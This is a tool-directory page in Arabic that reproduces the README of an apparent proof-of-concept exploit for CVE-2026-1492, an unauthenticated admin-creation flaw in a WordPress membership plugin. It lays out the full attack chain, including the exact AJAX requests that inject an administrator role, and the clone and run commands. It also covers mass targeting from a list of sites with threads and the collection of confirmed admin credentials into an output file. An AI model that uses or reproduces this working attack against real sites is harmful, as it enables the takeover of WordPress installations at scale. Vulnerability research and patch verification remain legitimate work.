Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - تصعيد امتيازات بدون مصادقة عبر تسجيل العضوية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-1492
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - تصعيد امتيازات بدون مصادقة عبر تسجيل العضوية

عرض المستودع
7منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1492

User Registration & Membership <= 5.1.2 - تصعيد الامتيازات دون مصادقة عبر تسجيل العضوية

Typing SVG


🔴 نظرة عامة على الثغرة

CVE-2026-1492 — تصعيد الامتيازات دون مصادقة عبر تسجيل العضوية

الحقلالتفاصيل
معرّف CVECVE-2026-1492
الخطورةحرجة — درجة CVSS v3.1: 9.8
ناقل الهجومCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
البرمجيات المتأثرةUser Registration & Membership — مُنشئ نماذج التسجيل المخصصة، ونموذج تسجيل الدخول المخصص، وملف المستخدم، وإضافة تقييد المحتوى والعضوية لـ WordPress
الإصدارات المتأثرةجميع الإصدارات حتى 5.1.2 وما يشملها
نوع الثغرةإدارة امتيازات غير سليمة — إنشاء حساب مسؤول دون مصادقة
المصادقةغير مطلوبة
CWECWE-269: إدارة امتيازات غير سليمة

الوصف:
إضافة User Registration & Membership الخاصة بـ WordPress معرّضة لثغرة تصعيد الامتيازات دون مصادقة في جميع الإصدارات حتى 5.1.2 وما يشملها. يعود سبب الثغرة إلى معالج AJAX user_registration_membership_register_member الذي يقبل قيمة role مقدَّمة من المستخدم أثناء عملية تسجيل العضوية دون فرض أي قائمة سماح على الخادم أو فحص صلاحيات. يمكن لمهاجم بعيد غير مصادَق تمامًا أن يصوغ سلسلة طلبات AJAX متعددة الخطوات — تبدأ بتسجيل حساب مستخدم جديد، ثم إرسال استدعاء register_member خبيث مع حقن "role": "administrator" داخل حمولة JSON الخاصة بـ members_data — لإنشاء حساب Administrator (مسؤول) في WordPress بصلاحيات كاملة وبصمت تام. يؤدي ذلك إلى اختراق كامل لتثبيت WordPress المتأثر دون الحاجة إلى أي تفاعل من المستخدم.


🛠️ وصف الأداة

هذا سكربت استغلال إثبات المفهوم (PoC) ينفّذ سلسلة هجوم كاملة مدركة للحالة ضد مواقع WordPress التي تشغّل إصدارًا معرّضًا من إضافة User Registration & Membership. تنفّذ الأداة استغلالًا ذكيًا متعدد المراحل يشمل الاكتشاف التلقائي، واستخراج خطط العضوية، وجمع الـ nonce، والتسجيل ثنائي التدفق، وحقن الدور، والتحقق من المسؤول.

🔗 سلسلة الهجوم الكاملة

[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 المتطلبات

متطلبات النظام

  • بايثون 3.8 أو أحدث
  • Linux / Windows / macOS

تبعيات بايثون

pip install requests urllib3 rich

أو عبر ملف المتطلبات:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 التثبيت

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ الاستخدام

التشغيل الأساسي

python3 CVE-2026-1492.py

تستخدم الأداة واجهة طرفية تفاعلية بالكامل مدعومة بمكتبة Rich، وتُطلب جميع المعاملات في وقت التشغيل.


🗂️ تنسيق قائمة الأهداف

أنشئ ملفًا نصيًا بسيطًا (الافتراضي: list.txt) بحيث يحتوي كل سطر على هدف واحد:

https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ المطالبات التفاعلية

Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 شرح معمّق للاستغلال

الخطوة 1 — الاكتشاف

تكتشف الأداة وتحلّل تلقائيًا:

الهدفالبيانات المستخرجة
/membership-pricing/معرّفات خطط العضوية، وروابط صفحة التسجيل
/registration/حقول النموذج، ورموز nonce، وروابط AJAX، ومدخلات الراديو الخاصة بالعضوية
كائن JS user_registration_paramsajax_url، وnonce security، والبيانات الوصفية للنموذج
ur_membership_frontend_localized_datanonce خاص بالعضوية، ونقطة نهاية AJAX

الخطوة 2 — طلب تسجيل AJAX

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

الخطوة 3 — حقن الدور عبر AJAX (الاستدعاء المعرّض للثغرة)

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ يقبل الخادم حقل role من العميل دون أي تحقق من قائمة السماح — وهذا هو السبب الجذري لثغرة CVE-2026-1492.

الخطوة 4 — التحقق من حساب المسؤول

تفتح الأداة جلسة جديدة، وتسجّل الدخول باستخدام بيانات الاعتماد المنشأة حديثًا، ثم تفحص:

نقطة النهايةالمؤشر المُفحَص
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab

📁 ملفات الإخراج

الملفالوصف
Nx_admin.txt✅ حسابات المسؤول المؤكدة
membership_success_log.txtجميع استدعاءات حقن دور العضوية الناجحة
discovery_log.txtبيانات الاكتشاف الكاملة لكل هدف (nonces، معرّفات، حقول)
registration_log.txtجميع طلبات واستجابات تسجيل AJAX
membership_log.txtجميع طلبات واستجابات عضوية AJAX
admin_check_log.txtمحاولات تسجيل الدخول ونتائج التحقق من المسؤول

��� تنسيق إخراج المسؤول

https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999

🖥️ نموذج مخرجات الطرفية

تنزيل الأداة